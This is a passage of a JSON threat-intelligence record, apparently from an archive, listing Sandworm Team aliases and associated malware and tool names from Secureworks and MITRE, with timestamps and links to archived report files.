				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439016,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.pdf",
		"text": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.txt",
		"img": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.jpg"
	}
}